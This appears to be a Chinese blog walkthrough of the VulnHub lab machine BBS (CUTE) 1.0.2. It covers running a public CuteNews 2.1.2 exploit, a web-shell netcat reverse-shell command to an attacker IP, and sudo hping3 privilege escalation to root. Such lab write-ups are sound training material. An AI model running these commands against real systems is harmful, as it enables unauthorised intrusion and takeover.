BBS (CUTE): 1.0.2

BBS (CUTE): 1.0.2 https://www.vulnhub.com/entry/bbs-cute-102,567/

靶场配置网络

登陆时按e 修改rw signie init=/bin/bash 按Ctrl+x 进入 root@(none) 模式

ip add 看到网卡名字叫做ens33

需要修改网卡配置文件

vi /etc/network/interfaces

allow-hotplug ens33

iface ens33 1inet dhcp

重启获得IP地址

使用目录扫描,获得

http://192.168.204.134/index.php

留意到版本号CuteNews 2.1.2

在kali上操作

searchsploit cutenews 2.1.2 看到路径

cp /usr/share/exploitdb/exploits/php/webapps/48800.py ./

修改py配置文件,将所有的/CuteNews删除

执行命令python3 48800.py

输入http://192.168.204.134获得账号名密码

登录BBS (CUTE): 1.0.2,找到注入点

http://192.168.204.134/uploads/avatar_vDnS6Pt85h_vDnS6Pt85h.php?cmd=nc -e /bin/bash 192.168.204.135 1234

在kali上连接 nc -lvvp 1234 (从KALI输入访问靶机)

python -c 'import pty;pty.spawn("/bin/bash")'

-c : 执行具体的代码

import :导入语句

pty : 终端(接口)

pty.spawn : 执行命令

export TERM=screen

stty rows 45 columns 194 (参考stty -a)

reset

通过sudo -l 查看权限

/usr/sbin/hping3 获得root权限

find / -name /root/root.txt

相关推荐
刘婉晴1 天前
【Kali 渗透测试】信息收集
网络安全·渗透测试
暗流者1 天前
ctf wiki中kernel pwn 学习编译内核(2026年最新版)
学习·安全·网络安全·pwn
vortex51 天前
NetExec 全模块使用手册
windows·网络安全
上学的小垃圾1 天前
基于Centos9部署OpenVP*
网络·网络协议·网络安全·信息与通信
Bruce_Liuxiaowei1 天前
网络连通性实战:如何判断进出口流量能否通行
网络·网络安全·内网渗透
hk11241 天前
【Adversarial/Forensics】2026年度对抗性攻击防御与持久化内存取证基准索引 (Benchmark Index)
人工智能·网络安全·数据分析·系统架构·数据集
hk11241 天前
【Algo/Forensics】2026年度无损压缩算法与高阶网络取证基准索引 (Benchmark Index)
大数据·算法·网络安全·系统架构·数据集
mooyuan天天1 天前
网络安全渗透靶场学习经验&2025年个人博客技术深度总结
安全·web安全·网络安全·渗透测试·靶场
pps-key1 天前
Nmap 完整教学与 Linux 指令详解
linux·计算机网络·安全·web安全·网络安全·系统安全·网络攻击模型
脆皮瞎1 天前
局域网Arp与DNS劫持
网络安全·内网穿透·dns劫持